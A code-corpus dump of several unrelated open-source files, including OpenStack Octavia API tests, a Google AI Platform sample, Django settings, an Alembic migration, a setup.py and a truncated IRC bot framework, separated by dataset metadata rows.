self.get(self.AZPS_PATH, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_update(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"hello": "world"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_update_deleted_id(self):
update_data = {'name': 'fake_profile'}
body = self._build_body(update_data)
response = self.put(self.AZP_PATH.format(azp_id=constants.NIL_UUID),
body, status=404)
self.assertEqual('Availability Zone Profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_update_nothing(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
body = self._build_body({})
self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_update_name_none(self):
self._test_update_param_none(constants.NAME)
def test_update_provider_name_none(self):
self._test_update_param_none(constants.PROVIDER_NAME)
def test_update_availability_zone_data_none(self):
self._test_update_param_none(constants.AVAILABILITY_ZONE_DATA)
def _test_update_param_none(self, param_name):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
expect_error_msg = ("None is not a valid option for %s" %
param_name)
body = self._build_body({param_name: None})
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body,
status=400)
self.assertEqual(expect_error_msg, response.json['faultstring'])
def test_update_no_availability_zone_data(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt'}
body = self._build_body(update_data)
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_update_authorized(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')),
body)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"hello": "world"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_update_not_authorized(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
update_data = {'name': 'the_profile', constants.PROVIDER_NAME: 'amp',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')),
body, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_update_in_use(self):
azp = self.create_availability_zone_profile(
'test_profile', 'noop_driver', '{"x": "y"}')
self.create_availability_zone(
'name1', 'description', azp.get('id'), True)
# Test updating provider while in use is not allowed
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt'}
body = self._build_body(update_data)
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body,
status=409)
err_msg = ("Availability Zone Profile {} is in use and cannot be "
"modified.".format(azp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
# Test updating availability zone data while in use is not allowed
update_data = {'name': 'the_profile',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body,
status=409)
err_msg = ("Availability Zone Profile {} is in use and cannot be "
"modified.".format(azp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
# Test that you can still update the name when in use
update_data = {'name': 'the_profile'}
body = self._build_body(update_data)
response = self.put(self.AZP_PATH.format(azp_id=azp.get('id')), body)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.AVAILABILITY_ZONE_DATA))
def test_delete(self):
azp = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
self.delete(self.AZP_PATH.format(azp_id=azp.get('id')))
response = self.get(self.AZP_PATH.format(
azp_id=azp.get('id')), status=404)
err_msg = "Availability Zone Profile %s not found." % azp.get('id')
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_delete_deleted_id(self):
response = self.delete(self.AZP_PATH.format(azp_id=constants.NIL_UUID),
status=404)
self.assertEqual('Availability Zone Profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_delete_nonexistent_id(self):
response = self.delete(self.AZP_PATH.format(azp_id='bogus_id'),
status=404)
self.assertEqual('Availability Zone Profile bogus_id not found.',
response.json.get('faultstring'))
def test_delete_authorized(self):
azp = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(self.AZP_PATH.format(azp_id=azp.get('id')))
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(self.AZP_PATH.format(
azp_id=azp.get('id')), status=404)
err_msg = "Availability Zone Profile %s not found." % azp.get('id')
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_delete_not_authorized(self):
azp = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
response = self.delete(self.AZP_PATH.format(
azp_id=azp.get('id')), status=403)
api_azp = response.json
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, api_azp)
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test1', response.get('name'))
def test_delete_in_use(self):
azp = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.create_availability_zone(
'name1', 'description', azp.get('id'), True)
response = self.delete(self.AZP_PATH.format(azp_id=azp.get('id')),
status=409)
err_msg = ("Availability Zone Profile {} is in use and cannot be "
"modified.".format(azp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('test1', response.get('name'))
|
apache-2.0
| 1,955,087,208,449,069,000
| 49.337861
| 79
| 0.58835
| false
| 3.637914
| true
| false
| false
|
jinhong666/Python
|
AvailabilityMonitor/DbAccess/dbaccesser.py
|
1
|
1073
|
#!/usr/bin/python
from Tools.datetimetool import DateTimeTool
import logging
from DbAccess import DBHelper
SOCKET_TIMEOUT = 1
class DbAccesser:
def __init__(self,host,user,pwd,db):
self._dbHelper = DBHelper(host,user,pwd,db)
self._logger = logging.getLogger("root")
def RecordMonitor(self,domain,url,ip,status,isVip):
sqlStr = 'insert into MonitorRecord(domain,WebIP,MonStatus,monTime,isVip,monUrl) VALUES (%s,%s,%s,%s,%s,%s)'
params = (domain,ip,status,DateTimeTool.GetCurrentTimeStr(),isVip,url)
try:
self._dbHelper.ExcuteNoneQuery(sqlStr,params)
except Exception as e:
logging.error("记录监控信息错误",e.args[1])
def GetDayStat(self,domain,url,ip,isVip):
sqlStr = "select count(1) from DayStat where Domain=%s and ip=%s and isVip=%s and monUrl=%s"
params = (domain,ip,isVip,url)
try:
self._dbHelper.ExcuteScalarQuery(sqlStr,params)
except Exception as e:
self._logger.error('获取按日统计错误:',e.args[1])
|
apache-2.0
| 5,166,579,525,175,662,000
| 33.633333
| 116
| 0.6564
| false
| 3.12012
| false
| false
| false
|
googleapis/python-aiplatform
|
samples/snippets/create_hyperparameter_tuning_job_python_package_sample.py
|
1
|
3771
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START aiplatform_create_hyperparameter_tuning_job_python_package_sample]
from google.cloud import aiplatform
def create_hyperparameter_tuning_job_python_package_sample(
project: str,
display_name: str,
executor_image_uri: str,
package_uri: str,
python_module: str,
location: str = "us-central1",
api_endpoint: str = "us-central1-aiplatform.googleapis.com",
):
# The AI Platform services require regional API endpoints.
client_options = {"api_endpoint": api_endpoint}
# Initialize client that will be used to create and send requests.
# This client only needs to be created once, and can be reused for multiple requests.
client = aiplatform.gapic.JobServiceClient(client_options=client_options)
# study_spec
metric = {
"metric_id": "val_rmse",
"goal": aiplatform.gapic.StudySpec.MetricSpec.GoalType.MINIMIZE,
}
conditional_parameter_decay = {
"parameter_spec": {
"parameter_id": "decay",
"double_value_spec": {"min_value": 1e-07, "max_value": 1},
"scale_type": aiplatform.gapic.StudySpec.ParameterSpec.ScaleType.UNIT_LINEAR_SCALE,
},
"parent_discrete_values": {"values": [32, 64]},
}
conditional_parameter_learning_rate = {
"parameter_spec": {
"parameter_id": "learning_rate",
"double_value_spec": {"min_value": 1e-07, "max_value": 1},
"scale_type": aiplatform.gapic.StudySpec.ParameterSpec.ScaleType.UNIT_LINEAR_SCALE,
},
"parent_discrete_values": {"values": [4, 8, 16]},
}
parameter = {
"parameter_id": "batch_size",
"discrete_value_spec": {"values": [4, 8, 16, 32, 64, 128]},
"scale_type": aiplatform.gapic.StudySpec.ParameterSpec.ScaleType.UNIT_LINEAR_SCALE,
"conditional_parameter_specs": [
conditional_parameter_decay,
conditional_parameter_learning_rate,
],
}
# trial_job_spec
machine_spec = {
"machine_type": "n1-standard-4",
"accelerator_type": aiplatform.gapic.AcceleratorType.NVIDIA_TESLA_K80,
"accelerator_count": 1,
}
worker_pool_spec = {
"machine_spec": machine_spec,
"replica_count": 1,
"python_package_spec": {
"executor_image_uri": executor_image_uri,
"package_uris": [package_uri],
"python_module": python_module,
"args": [],
},
}
# hyperparameter_tuning_job
hyperparameter_tuning_job = {
"display_name": display_name,
"max_trial_count": 4,
"parallel_trial_count": 2,
"study_spec": {
"metrics": [metric],
"parameters": [parameter],
"algorithm": aiplatform.gapic.StudySpec.Algorithm.RANDOM_SEARCH,
},
"trial_job_spec": {"worker_pool_specs": [worker_pool_spec]},
}
parent = f"projects/{project}/locations/{location}"
response = client.create_hyperparameter_tuning_job(
parent=parent, hyperparameter_tuning_job=hyperparameter_tuning_job
)
print("response:", response)
# [END aiplatform_create_hyperparameter_tuning_job_python_package_sample]
|
apache-2.0
| 1,663,557,871,573,529,000
| 35.970588
| 95
| 0.638823
| false
| 3.601719
| false
| false
| false
|
dNG-git/pas_upnp
|
src/dNG/data/upnp/identifier_mixin.py
|
1
|
5198
|
# -*- coding: utf-8 -*-
"""
direct PAS
Python Application Services
----------------------------------------------------------------------------
(C) direct Netware Group - All rights reserved
https://www.direct-netware.de/redirect?pas;upnp
The following license agreement remains valid unless any additions or
changes are being made by direct Netware Group in a written form.
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
more details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
----------------------------------------------------------------------------
https://www.direct-netware.de/redirect?licenses;gpl
----------------------------------------------------------------------------
#echo(pasUPnPVersion)#
#echo(__FILEPATH__)#
"""
import re
from dNG.data.binary import Binary
class IdentifierMixin(object):
"""
"IdentifierMixin" implements methods to get UPnP identifier values.
:author: direct Netware Group et al.
:copyright: direct Netware Group - All rights reserved
:package: pas
:subpackage: upnp
:since: v0.2.00
:license: https://www.direct-netware.de/redirect?licenses;gpl
GNU General Public License 2
"""
RE_USN_URN = re.compile("^urn:(.+):(.+):(.*):(.*)$", re.I)
"""
URN RegExp
"""
def __init__(self):
"""
Constructor __init__(IdentifierMixin)
:since: v0.2.00
"""
self.identifier = None
"""
Parsed UPnP identifier
"""
#
def _get_identifier(self):
"""
Returns the UPnP USN string.
:return: (dict) Parsed UPnP identifier; None if not set
:since: v0.2.00
"""
return self.identifier
#
def get_type(self):
"""
Returns the UPnP service type.
:return: (str) Service type
:since: v0.2.00
"""
return self.identifier['type']
#
def get_udn(self):
"""
Returns the UPnP UDN value.
:return: (str) UPnP service UDN
:since: v0.2.00
"""
return self.identifier['uuid']
#
def get_upnp_domain(self):
"""
Returns the UPnP service specification domain.
:return: (str) UPnP service specification domain
:since: v0.2.00
"""
return self.identifier['domain']
#
def get_urn(self):
"""
Returns the UPnP serviceType value.
:return: (str) UPnP URN
:since: v0.2.00
"""
return self.identifier['urn']
#
def get_usn(self):
"""
Returns the UPnP USN value.
:return: (str) UPnP USN
:since: v0.2.00
"""
return "uuid:{0}::urn:{1}".format(self.get_udn(), self.get_urn())
#
def get_version(self):
"""
Returns the UPnP device type version.
:return: (str) Device type version; None if undefined
:since: v0.2.00
"""
return self.identifier.get("version")
#
def _set_identifier(self, identifier):
"""
Sets the UPnP USN identifier.
:param identifier: Parsed UPnP identifier
:since: v0.2.00
"""
self.identifier = identifier
#
@staticmethod
def get_identifier(usn, bootid = None, configid = None):
"""
Parses the given UPnP USN string.
:param usn: UPnP USN
:param bootid: UPnP bootId (bootid.upnp.org) if any
:param configid: UPnP configId (configid.upnp.org) if any
:return: (dict) Parsed UPnP identifier; None on error
:since: v0.2.00
"""
usn = Binary.str(usn)
if (type(usn) == str):
usn_data = usn.split("::", 1)
device_id = usn_data[0].lower().replace("-", "")
else: device_id = ""
if (device_id.startswith("uuid:")):
device_id = device_id[5:]
_return = { "device": device_id,
"bootid": None,
"configid": None,
"uuid": usn_data[0][5:],
"class": "unknown",
"usn": usn
}
if (bootid is not None and configid is not None):
_return['bootid'] = bootid
_return['configid'] = configid
#
re_result = (IdentifierMixin.RE_USN_URN.match(usn_data[1]) if (len(usn_data) > 1) else None)
if (re_result is not None):
_return['urn'] = usn_data[1][4:]
_return['domain'] = re_result.group(1)
_return['class'] = re_result.group(2)
_return['type'] = re_result.group(3)
_return['version'] = re_result.group(4)
elif (usn[-17:].lower() == "::upnp:rootdevice"): _return['class'] = "rootdevice"
else: _return = None
return _return
#
#
|
gpl-2.0
| 28,591,505,664,425,940
| 24.111111
| 104
| 0.563678
| false
| 3.697013
| true
| false
| false
|
JackyChou/SGRS
|
SGRS/common_settings.py
|
1
|
3285
|
"""
Django settings for SGRS project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^2oeytt80lcv67-b7o3x4dav&x08ao&@d3k01-p8=s=ygbgz5u'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'GeneralReport',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'SGRS.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'SGRS.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'SGRS_db',
'USER': 'jacky',
'PASSWORD': 'jacky',
'HOST': '127.0.0.1',
'PORT': '',
}
}
DB_FOR_CHOICES = (
('default', u'test db',),
)
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'query_result_cache',
'KEY_PREFIX': 'SGRS',
'TIMEOUT':60 * 30,
'MAX_ENTRIES':100,
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, "static")
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'GeneralReport.SGRSUser'
LOGIN_URL = '/sgrs/login/'
import time, datetime
CLEAN_TMP_FILE_TIMESTAMP = int(time.mktime(
(datetime.date.today() - datetime.timedelta(days=1)).timetuple()
))
|
gpl-2.0
| 4,849,460,929,883,837,000
| 24.269231
| 71
| 0.666971
| false
| 3.355465
| false
| false
| false
|
miguelgrinberg/microblog
|
migrations/versions/780739b227a7_posts_table.py
|
1
|
1057
|
"""posts table
Revision ID: 780739b227a7
Revises: e517276bb1c2
Create Date: 2017-09-11 12:23:25.496587
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '780739b227a7'
down_revision = 'e517276bb1c2'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('body', sa.String(length=140), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_post_timestamp'), table_name='post')
op.drop_table('post')
# ### end Alembic commands ###
|
mit
| -2,497,830,188,465,469,400
| 27.567568
| 83
| 0.663198
| false
| 3.272446
| false
| false
| false
|
googleapis/googleapis-gen
|
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/enums/types/merchant_center_link_status.py
|
1
|
1291
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package='google.ads.googleads.v8.enums',
marshal='google.ads.googleads.v8',
manifest={
'MerchantCenterLinkStatusEnum',
},
)
class MerchantCenterLinkStatusEnum(proto.Message):
r"""Container for enum describing possible statuses of a Google
Merchant Center link.
"""
class MerchantCenterLinkStatus(proto.Enum):
r"""Describes the possible statuses for a link between a Google
Ads customer and a Google Merchant Center account.
"""
UNSPECIFIED = 0
UNKNOWN = 1
ENABLED = 2
PENDING = 3
__all__ = tuple(sorted(__protobuf__.manifest))
|
apache-2.0
| 245,458,820,869,564,640
| 29.738095
| 74
| 0.693261
| false
| 4.085443
| false
| false
| false
|
ActiDoo/gamification-engine
|
setup.py
|
1
|
2935
|
import os
import re
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.txt')) as f:
README = f.read()
with open(os.path.join(here, 'CHANGES.txt')) as f:
CHANGES = f.read()
requires = [
'pyramid',
'pyramid_chameleon',
'pyramid_debugtoolbar',
'pyramid_tm',
'SQLAlchemy',
'transaction',
'zope.sqlalchemy',
'waitress',
'pytz',
'dogpile.cache',
'pyramid_dogpile_cache',
'Flask>=0.10.1',
'flask-admin',
'psycopg2',
'pymemcache',
'mock',
'alembic',
'raven',
'jsl',
'jsonschema',
'pyparsing',
'python-crontab',
'croniter',
'zope.interface',
'zope.sqlalchemy',
'argon2'
]
version = ''
with open('gengine/__init__.py', 'r') as fd:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('Cannot find version information')
setup(name='gamification-engine',
version=version,
description='The Gamification-Engine (gengine) provides an API for integrating any kinds of gamification features.',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pyramid",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
"Topic :: Software Development :: Libraries",
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: MIT License"
],
author='Marcel Sander, Jens Janiuk, Matthias Feldotto',
author_email='marcel@gamification-software.com',
license='MIT',
url='https://www.gamification-software.com',
keywords='web wsgi bfg pylons pyramid gamification',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='gengine',
install_requires=requires,
extras_require={
"auth": [
'argon2'
],
"pushes": [
'tapns3',
'python-gcm',
],
"testing": [
'testing.postgresql',
'testing.redis',
'names'
]
},
entry_points="""\
[paste.app_factory]
main = gengine:main
[console_scripts]
initialize_gengine_db = gengine.maintenance.scripts.initializedb:main
generate_gengine_erd = gengine.maintenance.scripts.generate_erd:main
generate_gengine_revision = gengine.maintenance.scripts.generate_revision:main
gengine_push_messages = gengine.maintenance.scripts.push_messages:main
gengine_scheduler_beat = gengine.maintenance.scripts.scheduler_beat:main
gengine_scheduler_worker = gengine.maintenance.scripts.scheduler_worker:main
[redgalaxy.plugins]
gengine = gengine:redgalaxy
""",
)
|
mit
| -1,113,054,953,801,862,000
| 28.646465
| 122
| 0.600341
| false
| 3.618989
| false
| false
| false
|
keseldude/brobot
|
brobot/core/bot.py
|
1
|
10481
|
#===============================================================================
# brobot
# Copyright (C) 2010 Michael Keselman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#===============================================================================
from irc.clients import Client
from irc.structures import Server
from irc.events import Events
from irc.connections import IRCError
from threading import Thread
import itertools
import logging
import os
log = logging.getLogger(__name__)
class Plugin(object):
"""Abstract class, which initializes every plugin to have the essentials:
* a name
* a link to the ircbot
* the path to the common shelf (for serialized objects).
"""
name = 'unnamed'
admin = False
def __init__(self, ircbot):
self.ircbot = ircbot
self.shelf_path = os.path.join(ircbot.data_path, 'shelf.db')
try:
self.load()
except NotImplementedError:
pass
def load(self):
raise NotImplementedError
class CommandPlugin(Plugin):
"""Abstract Plugin to be used for commands."""
class Action(object):
PRIVMSG = staticmethod(lambda bot: bot.privmsg)
NOTICE = staticmethod(lambda bot: bot.notice)
def _process(self, connection, source, target, args):
result = self.process(connection, source, target, args)
if not result:
return
try:
action = result['action'](self.ircbot)
target = result['target']
message = result['message']
except KeyError:
log.error(u'Invalid plugin response.')
else:
if isinstance(message, basestring):
message = (message,)
for line in message:
try:
action(connection, target, line)
except IRCError as e:
log.error(e)
except Exception as e:
log.error('Unexpected exception occurred: %s' % e)
def process(self, connection, source, target, args):
raise NotImplementedError
def privmsg(self, target, message):
return {'action': self.Action.PRIVMSG,
'target': target,
'message': message
}
def notice(self, target, message):
return {'action': self.Action.NOTICE,
'target': target,
'message': message
}
class EventPlugin(Plugin):
"""Abstract Plugin to be used for events."""
def process(self, connection, source='', target='', args=None, message=''):
raise NotImplementedError
class IRCBot(Client):
"""Functional implementation of Client, which serves as an IRC bot as
opposed to a fully function client."""
def __init__(self, settings):
self.settings = settings
self.data_path = os.path.join(settings['base_path'],
settings['data_path'])
if not os.path.exists(self.data_path):
try:
os.mkdir(self.data_path)
except OSError:
raise Exception('Unable to create data directory.')
self._register_loggers()
self.pid_path = os.path.join(self.data_path, settings['pid_filename'])
self._save_pid(self.pid_path)
self.admins = {}
self.initial_channels = {}
servers = []
for server in settings['servers']:
irc_server = Server(server['host'], server['port'], server['nick'],
owner=server['owner'], name=server['name'],
use_ssl=server['ssl'])
servers.append(irc_server)
self.admins[irc_server] = server['admins']
self.initial_channels[irc_server] = server['channels']
self.plugin_path = settings['plugin_path']
event_plugins = {}
for event in settings['event_plugins']:
if 'plugins' not in event:
continue
name = getattr(Events, event['name'])
plugins = []
for plugin in event['plugins']:
split_path = plugin.split('.')
plugin_name = split_path.pop()
module_path = '.'.join(split_path)
module = __import__('%s.%s' % (self.plugin_path, module_path))
for part in split_path:
module = getattr(module, part)
plugins.append(getattr(module, plugin_name)(self))
event_plugins[name] = plugins
super(IRCBot, self).__init__(servers, event_plugins)
self.command_plugins = {}
self.command_prefix = settings['command_prefix']
self.version = settings['version_string']
self._restart = False
def _register_loggers(self):
root_logger = logging.getLogger('')
root_logger.setLevel(logging.DEBUG)
fh = logging.FileHandler(os.path.join(self.data_path,
self.settings['log_filename']),
encoding='utf-8')
fh_fmt = logging.Formatter("%(asctime)s - %(name)s - %(levelname)-8s: \
%(message)s")
